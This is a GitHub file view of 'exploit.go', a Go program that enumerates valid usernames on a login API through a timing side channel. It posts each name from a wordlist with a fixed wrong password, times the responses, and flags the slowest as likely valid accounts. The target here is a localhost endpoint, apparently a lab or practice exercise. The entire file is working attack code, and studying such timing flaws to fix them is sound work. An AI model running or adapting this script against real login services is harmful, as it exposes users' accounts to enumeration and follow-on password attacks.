-
Notifications
You must be signed in to change notification settings - Fork 23
Expand file tree
/
Copy pathexploit.go
More file actions
104 lines (91 loc) · 2.37 KB
/
exploit.go
File metadata and controls
104 lines (91 loc) · 2.37 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
package main
import (
"bufio"
"encoding/json"
"log"
"net/http"
"os"
"strings"
"time"
)
var (
usernameChan chan string
resultsChan chan result
)
type login struct {
Username string `json:"username"`
Password string `json:"password"`
}
type result struct {
username string
time int64
}
func main() {
var usernameSlice []string
var resultsSlice []result
file, err := os.Open("names.txt")
if err != nil {
log.Fatalln(err)
}
defer file.Close()
//Create a reader and read usernames in
scanner := bufio.NewScanner(file)
for scanner.Scan() { //Build wordlist as a Slice (array)
usernameSlice = append(usernameSlice,
strings.TrimSuffix(scanner.Text(),
"\n"))
}
//Create buffers/channels for threads
bufSize := len(usernameSlice)
usernameChan = make(chan string, bufSize)
resultsChan = make(chan result, bufSize)
log.Println("Usernames buffered, sending requests")
for i:=0;i<bufSize;i++ { //Send the work to each thread
usernameChan <- usernameSlice[i]
//Back off every 50 requests, otherwise you *WILL* DoS the server
if i % 50 == 0 {time.Sleep(time.Millisecond*200)}
go doAndtimeRequest(<- usernameChan)
}
log.Println("Work sent")
for i:=0;i<bufSize;i++ { //Retrieve results from each thread
var res result
res = <- resultsChan
resultsSlice = append(resultsSlice, res)
}
log.Println("Work completed")
max := findMax(resultsSlice)
findValidUsernames(resultsSlice,max)
}
func findValidUsernames(res []result, max int64) { //using the max time, find times within 10% of this and print unames
threshold := 0.9 * float64(max)
for _, val := range res {
if float64(val.time) > threshold {
log.Println(val.username, "is likely to be valid")
}
}
}
func findMax(res []result) int64 {
max := int64(0)
for _, val := range res {
if val.time > max {
max = val.time
}
}
return max
}
func doAndtimeRequest(username string) {
start := time.Now()
doLoginPOST(username)
end := time.Now()
res := result{username: username, time: end.Sub(start).Nanoseconds()}
resultsChan <- res
}
func doLoginPOST(username string) { //This performs the API POST request
jsonStr, err := json.Marshal(login{Username: username, Password: "invalidPassword1"})
if err != nil {
log.Println(err.Error())
}
reader := strings.NewReader(string(jsonStr))
resp, _ := http.Post("http://localhost:8081/api/user/login", "application/json", reader)
resp.Body.Close()
}